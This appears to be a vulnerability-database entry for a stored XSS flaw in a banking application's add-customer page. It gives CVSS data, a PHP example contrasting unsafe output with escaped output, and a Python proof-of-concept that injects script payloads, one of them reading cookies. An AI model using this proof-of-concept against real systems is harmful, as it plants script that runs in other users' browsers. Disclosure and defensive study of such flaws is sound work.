Security Vulnerability Report
CVE-2025-11333 CVSS 2.4 LOW

CVE-2025-11333

Published: 2025-10-06 11:15:33
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was identified in langleyfcu Online Banking System up to 57437e6400ce0ae240e692c24e6346b8d0c17d7a. This impacts an unknown function of the file /customer_add_action.php of the component Add Customer Page. The manipulation of the argument First Name leads to cross site scripting. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided.
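The root cause described above is CWE-79: a value submitted as First Name is stored and later written into HTML without encoding. The following PHP is an added illustration written for this report, not code from the langleyfcu project; it assumes the customer record is stored with the raw POST value and rendered into a table on a customer list page, and the function and field names (`first_name`, `last_name`, `render_customer_row`, `validate_name`) are hypothetical. It places the vulnerable rendering pattern beside the hardened form.

```php
<?php
// Added illustration, not code from the langleyfcu project. It assumes the
// customer record is stored with the raw POST value and later rendered into
// HTML on a customer list page; field and function names are hypothetical.

// Vulnerable pattern (CWE-79): the stored value is echoed straight into HTML,
// so a First Name containing a <script> tag runs in every viewer's browser.
function render_customer_row_vulnerable(array $customer): string {
    return "<tr><td>{$customer['first_name']}</td><td>{$customer['last_name']}</td></tr>";
}

// Hardened form: every untrusted value is HTML-entity encoded at the point of
// output. ENT_QUOTES also encodes single quotes so the value is safe inside
// attribute values, ENT_SUBSTITUTE avoids returning an empty string on invalid
// UTF-8, and the explicit charset avoids encoding mismatches.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_customer_row(array $customer): string {
    return '<tr><td>' . h($customer['first_name']) . '</td><td>'
         . h($customer['last_name']) . '</td></tr>';
}

// Defence in depth on the input side: a name field has no business containing
// markup, so reject (rather than silently strip) values with angle brackets or
// control characters before they are stored. Output encoding is still required,
// because the same value may be rendered by code paths that never ran this check.
function validate_name(string $value): bool {
    return mb_strlen($value, 'UTF-8') <= 64
        && preg_match('/^[^<>\x00-\x1F]+$/u', $value) === 1;
}

// Constructed sample record, as a stored XSS attempt would leave it in the database.
$sample = ['first_name' => '<script>alert("XSS");</script>', 'last_name' => 'TestUser'];

echo render_customer_row_vulnerable($sample), PHP_EOL; // script tag survives intact
echo render_customer_row($sample), PHP_EOL;            // &lt;script&gt;... shown as text
var_dump(validate_name($sample['first_name']));        // bool(false): rejected on input
var_dump(validate_name('Ana María'));                  // bool(true): accented names pass
```

The encoding step belongs at output time, in the template or view that builds the customer list, not only in `customer_add_action.php`: records already stored before a fix is deployed will otherwise keep executing in viewers' browsers. A Content-Security-Policy that disallows inline scripts is a further layer that limits what such a stored payload can do.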

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

langleyfcu Online Banking System (commit 57437e6400ce0ae240e692c24e6346b8d0c17d7a and earlier versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11333 PoC - Stored XSS in langleyfcu Online Banking System
# Vulnerability Location: /customer_add_action.php
# Vulnerable Parameter: First Name

import requests

# Target configuration
TARGET_URL = "http://target-bank-system.com"
LOGIN_URL = f"{TARGET_URL}/login.php"
ADD_CUSTOMER_URL = f"{TARGET_URL}/customer_add_action.php"

# Attacker credentials (requires high privilege account)
USERNAME = "admin"
PASSWORD = "password123"

# Malicious payload for XSS injection in First Name field
XSS_PAYLOAD = '<script>alert("XSS");</script>'
# Alternative payloads:
# XSS_PAYLOAD = '<img src=x onerror=alert(document.cookie)>'
# XSS_PAYLOAD = '<svg/onload=alert("XSS")>'


def exploit_xss():
    """
    Exploit stored XSS vulnerability in customer_add_action.php
    by injecting malicious script through the First Name parameter.
    """
    session = requests.Session()

    # Step 1: Login to obtain authenticated session
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    session.post(LOGIN_URL, data=login_data)

    # Step 2: Inject malicious payload via First Name parameter
    customer_data = {
        "first_name": XSS_PAYLOAD,
        "last_name": "TestUser",
        "email": "[email protected]",
        "phone": "1234567890",
        "address": "Test Address"
    }
    response = session.post(ADD_CUSTOMER_URL, data=customer_data)

    if response.status_code == 200:
        print("[+] XSS payload injected successfully!")
        print(f"[+] Payload: {XSS_PAYLOAD}")
        print("[+] When any user views the customer list, the script will execute.")
    else:
        print(f"[-] Failed to inject payload. Status code: {response.status_code}")


if __name__ == "__main__":
    exploit_xss()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11333", "sourceIdentifier": "[email protected]", "published": "2025-10-06T11:15:33.230", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in langleyfcu Online Banking System up to 57437e6400ce0ae240e692c24e6346b8d0c17d7a. This impacts an unknown function of the file /customer_add_action.php of the component Add Customer Page. The manipulation of the argument First Name leads to cross site scripting. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": 
"NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", "baseScore": 3.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.4, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/mhszed/Report/blob/main/online-banking-system-mastercustomer_home.php%20xss1.docx", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327216", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327216", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.664562", "source": "[email protected]"}]}}